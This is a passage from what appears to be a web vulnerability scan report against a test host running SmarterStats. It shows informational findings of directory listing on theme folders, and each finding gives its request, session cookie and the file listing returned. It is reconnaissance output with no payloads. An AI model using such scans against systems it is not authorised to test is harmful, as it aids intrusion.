<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 609 <A href="styles.css">styles.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.32. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Spell/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Spell/

Request

GET /App_Themes/Default/Controls/Spell/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:09 GMT
Content-Length: 1589
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Spell/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Spell/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Img/">Img</A>
Thursday, October 07, 2010 01:00 PM 4,102 <A href="RadSpell.css">RadSpell.css</A>
Thursday, October 07, 2010 01:00 PM 0 <A href="RadSpellCommon.css">RadSpellCommon.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.33. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Spell/Img/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Spell/Img/

Request

GET /App_Themes/Default/Controls/Spell/Img/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Spell/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:11 GMT
Content-Length: 1854
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Spell/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Spell/Img/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/Spell/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,162 <A href="spellButtonCombined.gif">spellButtonCombined.gif</A>
Thursday, October 07, 2010 01:00 PM 67 <A href="spellHeadLeft.gif">spellHeadLeft.gif</A>
Thursday, October 07, 2010 01:00 PM 59 <A href="spellHeadMiddle.gif">spellHeadMiddle.gif</A>
Thursday, October 07, 2010 01:00 PM 76 <A href="spellHeadRight.gif">spellHeadRight.gif</A>
Thursday, October 07, 2010 01:00 PM 55 <A href="spellWinBack.gif">spellWinBack.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.34. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/TabStrip/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/TabStrip/

Request

GET /App_Themes/Default/Controls/TabStrip/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:16 GMT
Content-Length: 1591
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/TabStrip/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/TabStrip/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Img/">Img</A>
Thursday, October 07, 2010 01:00 PM 1,194 <A href="TabStrip.css">TabStrip.css</A>
Thursday, October 07, 2010 01:00 PM 4,711 <A href="TabStripBase.css">TabStripBase.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.35. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/TabStrip/Img/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/TabStrip/Img/

Request

GET /App_Themes/Default/Controls/TabStrip/Img/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/TabStrip/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:17 GMT
Content-Length: 1724
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/TabStrip/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/TabStrip/Img/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/TabStrip/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 861 <A href="tabBar_tile.png">tabBar_tile.png</A>
Thursday, October 07, 2010 01:00 PM 98 <A href="tab_leftcap.png">tab_leftcap.png</A>
Thursday, October 07, 2010 01:00 PM 98 <A href="tab_rightcap.png">tab_rightcap.png</A>
Thursday, October 07, 2010 01:00 PM 689 <A href="tab_tile.png">tab_tile.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.36. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Toolbar/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Toolbar/

Request

GET /App_Themes/Default/Controls/Toolbar/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:24 GMT
Content-Length: 1585
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Toolbar/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Toolbar/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Img/">Img</A>
Thursday, October 07, 2010 01:00 PM 6,588 <A href="Toolbar.css">Toolbar.css</A>
Thursday, October 07, 2010 01:00 PM 10,411 <A href="ToolbarBase.css">ToolbarBase.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.37. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Toolbar/Img/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Toolbar/Img/

Request

GET /App_Themes/Default/Controls/Toolbar/Img/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Toolbar/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:24 GMT
Content-Length: 2094
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Toolbar/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Toolbar/Img/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/Toolbar/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 558 <A href="ToolbarBgH.gif">ToolbarBgH.gif</A>
Thursday, October 07, 2010 01:00 PM 599 <A href="ToolbarBgV.gif">ToolbarBgV.gif</A>
Thursday, October 07, 2010 01:00 PM 1,982 <A href="ToolbarItemActive.gif">ToolbarItemActive.gif</A>
Thursday, October 07, 2010 01:00 PM 2,248 <A href="ToolbarItemHover.gif">ToolbarItemHover.gif</A>
Thursday, October 07, 2010 01:00 PM 2,189 <A href="ToolbarSplButActive.gif">ToolbarSplButActive.gif</A>
Thursday, October 07, 2010 01:00 PM 2,427 <A href="ToolbarSplButHover.gif">ToolbarSplButHover.gif</A>
Thursday, October 07, 2010 01:00 PM 115 <A href="ToolbarSplitButtonArrow.gif">ToolbarSplitButtonArrow.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.38. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Window/

Request

GET /App_Themes/Default/Controls/Window/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:33 GMT
Content-Length: 1667
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Window/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Window/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="CssImg/">CssImg</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Img/">Img</A>
Thursday, October 07, 2010 01:00 PM 2,932 <A href="Window.css">Window.css</A>
Thursday, October 07, 2010 01:00 PM 9,790 <A href="WindowBase.css">WindowBase.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.39. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/CssImg/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Window/CssImg/

Request

GET /App_Themes/Default/Controls/Window/CssImg/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:33 GMT
Content-Length: 2305
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Window/CssImg/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Window/CssImg/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/Window/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 73 <A href="footerResize.gif">footerResize.gif</A>
Thursday, October 07, 2010 01:00 PM 126 <A href="PopIn_UpperTile.png">PopIn_UpperTile.png</A>
Thursday, October 07, 2010 01:00 PM 55 <A href="RadWMinimizedBg.gif">RadWMinimizedBg.gif</A>
Thursday, October 07, 2010 01:00 PM 105 <A href="RadWStatus.gif">RadWStatus.gif</A>
Thursday, October 07, 2010 01:00 PM 105 <A href="RadWWrapperBodyLeft.gif">RadWWrapperBodyLeft.gif</A>
Thursday, October 07, 2010 01:00 PM 43 <A href="RadWWrapperBodyRight.gif">RadWWrapperBodyRight.gif</A>
Thursday, October 07, 2010 01:00 PM 263 <A href="RadWWrapperHeaderCenter.gif">RadWWrapperHeaderCenter.gif</A>
Thursday, October 07, 2010 01:00 PM 100 <A href="TabMiddle.GIF">TabMiddle.GIF</A>
Thursday, October 07, 2010 01:00 PM 152 <A href="TabMiddleSelected.gif">TabMiddleSelected.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.40. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/Img/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Window/Img/

Request

GET /App_Themes/Default/Controls/Window/Img/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:42 GMT
Content-Length: 1413
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Window/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Window/Img/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/Window/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,047 <A href="close.gif">close.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.41. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Flash/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Flash/

Request

GET /App_Themes/Default/Flash/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:43 GMT
Content-Length: 1706
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Flash/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Flash/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 62,389 <A href="HistographGauge.swf">HistographGauge.swf</A>
Thursday, October 07, 2010 01:00 PM 87,069 <A href="HistographGauge2.swf">HistographGauge2.swf</A>
Thursday, October 07, 2010 01:00 PM 87,079 <A href="HistographGauge3.swf">HistographGauge3.swf</A>
Thursday, October 07, 2010 01:00 PM 50,809 <A href="RadialGauge.swf">RadialGauge.swf</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.42. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Images/16x16/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Images/16x16/

Request

GET /App_Themes/Default/Images/16x16/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:43 GMT
Content-Length: 19709
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/16x16/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Images/16x16/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,014 <A href="AbuseDetection.gif">AbuseDetection.gif</A>
Thursday, October 07, 2010 01:00 PM 616 <A href="AccountSettings.gif">AccountSettings.gif</A>
Thursday, October 07, 2010 01:00 PM 1,048 <A href="AddCannedReply.gif">AddCannedReply.gif</A>
Thursday, October 07, 2010 01:00 PM 1,045 <A href="AddToFavoritesSide.gif">AddToFavoritesSide.gif</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="Admin.gif">Admin.gif</A>
Thursday, October 07, 2010 01:00 PM 542 <A href="AgentStatusActiveAll.gif">AgentStatusActiveAll.gif</A>
Thursday, October 07, 2010 01:00 PM 330 <A href="AgentStatusActiveSome.gif">AgentStatusActiveSome.gif</A>
Thursday, October 07, 2010 01:00 PM 352 <A href="AgentStatusAFK.gif">AgentStatusAFK.gif</A>
Thursday, October 07, 2010 01:00 PM 348 <A href="AgentStatusInactive.gif">AgentStatusInactive.gif</A>
Thursday, October 07, 2010 01:00 PM 555 <A href="Aliases.gif">Aliases.gif</A>
Thursday, October 07, 2010 01:00 PM 616 <A href="AllArticles.gif">AllArticles.gif</A>
Thursday, October 07, 2010 01:00 PM 989 <A href="AllContacts.gif">AllContacts.gif</A>
Thursday, October 07, 2010 01:00 PM 608 <A href="AllDomains.gif">AllDomains.gif</A>
Thursday, October 07, 2010 01:00 PM 624 <A href="AllEvents.gif">AllEvents.gif</A>
Thursday, October 07, 2010 01:00 PM 1,031 <A href="AllMessages.gif">AllMessages.gif</A>
Thursday, October 07, 2010 01:00 PM 1,057 <A href="AllNotes.gif">AllNotes.gif</A>
Thursday, October 07, 2010 01:00 PM 1,024 <A href="AllRSS.gif">AllRSS.gif</A>
Thursday, October 07, 2010 01:00 PM 1,040 <A href="AllTasks.gif">AllTasks.gif</A>
Thursday, October 07, 2010 01:00 PM 583 <A href="Anti-Spam.gif">Anti-Spam.gif</A>
Thursday, October 07, 2010 01:00 PM 578 <A href="Anti-Virus.gif">Anti-Virus.gif</A>
Thursday, October 07, 2010 01:00 PM 601 <A href="Article.gif">Article.gif</A>
Thursday, October 07, 2010 01:00 PM 1,027 <A href="ArticleDraft.gif">ArticleDraft.gif</A>
Thursday, October 07, 2010 01:00 PM 140 <A href="ascx.gif">ascx.gif</A>
Thursday, October 07, 2010 01:00 PM 135 <A href="aspx.gif">aspx.gif</A>
Thursday, October 07, 2010 01:00 PM 200 <A href="Attachment.gif">Attachment.gif</A>
Thursday, October 07, 2010 01:00 PM 1,041 <A href="AutoResponder.gif">AutoResponder.gif</A>
Thursday, October 07, 2010 01:00 PM 1,054 <A href="Blacklist.gif">Blacklist.gif</A>
Thursday, October 07, 2010 01:00 PM 999 <A href="BlockedSenders.gif">BlockedSenders.gif</A>
